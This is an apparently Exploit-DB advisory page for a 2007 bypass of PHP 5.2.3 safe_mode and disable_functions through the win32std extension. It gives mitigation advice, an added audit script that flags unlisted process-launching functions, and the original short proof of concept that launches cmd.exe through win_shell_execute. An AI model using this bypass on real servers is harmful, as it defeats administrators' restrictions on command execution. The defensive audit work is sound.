vendor: PHP
by: shinnai
N/A
CVSS
HIGH
Bypass of safe_mode and disable_functions protections
CWE
Product Name: PHP
Affected Version From: PHP 5.2.3
Affected Version To: Unknown
Patch Exists: NO
Platforms Tested: Windows XP Professional SP2
2007

PHP 5.2.3 win32std extension safe_mode and disable_functions protections bypass

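This proof of concept bypasses the safe_mode and disable_functions protections in PHP 5.2.3 when the win32std extension is loaded. With safe_mode = On and disable_functions = system in php.ini, the script first calls system("cmd.exe") to confirm that the protections are active, then calls win_shell_execute() from win32std, which still launches cmd.exe. This works both from the command line interface and through Apache. The exploit has been tested on a fully patched Windows XP Professional SP2 system.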

Mitigation:

To mitigate this vulnerability, it is recommended to update to a newer version of PHP and apply any relevant security patches. Additionally, disabling the win32std extension or restricting its usage can help prevent exploitation.
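
A denylist such as disable_functions = system only covers the names it lists, so a launcher exported by an extension (win_shell_execute from win32std in this case) falls outside it. The audit script below is an added example, not part of the original advisory or the exploit author's code; it generalizes the check from win32std to every loaded extension, and the name pattern and the sample data are assumptions constructed for illustration.

```php
<?php
// Added example, not part of the original advisory.
// Reports internal functions whose names suggest process launching and that
// disable_functions does not cover, grouped by the extension providing them.

// Assumption: this name pattern is a heuristic chosen for this example.
const LAUNCH_PATTERN = '/(shell|exec|system|passthru|popen|proc_open|spawn)/i';

// Turn the comma-separated disable_functions value into a clean lowercase list.
function parse_disabled(string $iniValue): array
{
    $names = array_map('strtolower', array_map('trim', explode(',', $iniValue)));
    return array_values(array_filter($names, 'strlen'));
}

// Return [extension => [function, ...]] for launcher-like names not on the denylist.
function uncovered_launchers(array $funcsByExtension, array $disabled): array
{
    $findings = [];
    foreach ($funcsByExtension as $ext => $funcs) {
        foreach ($funcs as $fn) {
            $fn = strtolower($fn);
            if (preg_match(LAUNCH_PATTERN, $fn) && !in_array($fn, $disabled, true)) {
                $findings[$ext][] = $fn;
            }
        }
    }
    return $findings;
}

// Constructed sample mirroring the php.ini described in the PoC comments:
// system is denied, but the win32std launcher is not.
$sampleFuncs = [
    'standard' => ['system', 'strlen'],
    'win32std' => ['win_shell_execute'],
];
print_r(uncovered_launchers($sampleFuncs, parse_disabled('system')));

// Live check against the running interpreter's configuration.
$live = [];
foreach (get_loaded_extensions() as $ext) {
    $live[$ext] = get_extension_funcs($ext) ?: [];
}
print_r(uncovered_launchers($live, parse_disabled((string) ini_get('disable_functions'))));
```

Any extension that appears in the live report is a candidate for removal from php.ini or for having its functions added to disable_functions.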

Exploit-DB raw data:

<?php
//PHP 5.2.3 win32std extension safe_mode and disable_functions protections bypass

//author: shinnai
//mail: shinnai[at]autistici[dot]org
//site: http://shinnai.altervista.org

//Tested on XP Pro SP2 fully patched, worked both from the cli and on apache

//Thanks to rgod for all his precious advice :)

//I set php.ini in this way:
//safe_mode = On
//disable_functions = system
//if you launch the exploit from the cli, cmd.exe will be executed
//if you browse it through apache, you'll see a new cmd.exe process activated in taskmanager

if (!extension_loaded("win32std")) die("win32std extension required!");
system("cmd.exe"); //just to be sure that protections work well
win_shell_execute("..\\..\\..\\..\\windows\\system32\\cmd.exe");
?>

# milw0rm.com [2007-07-24]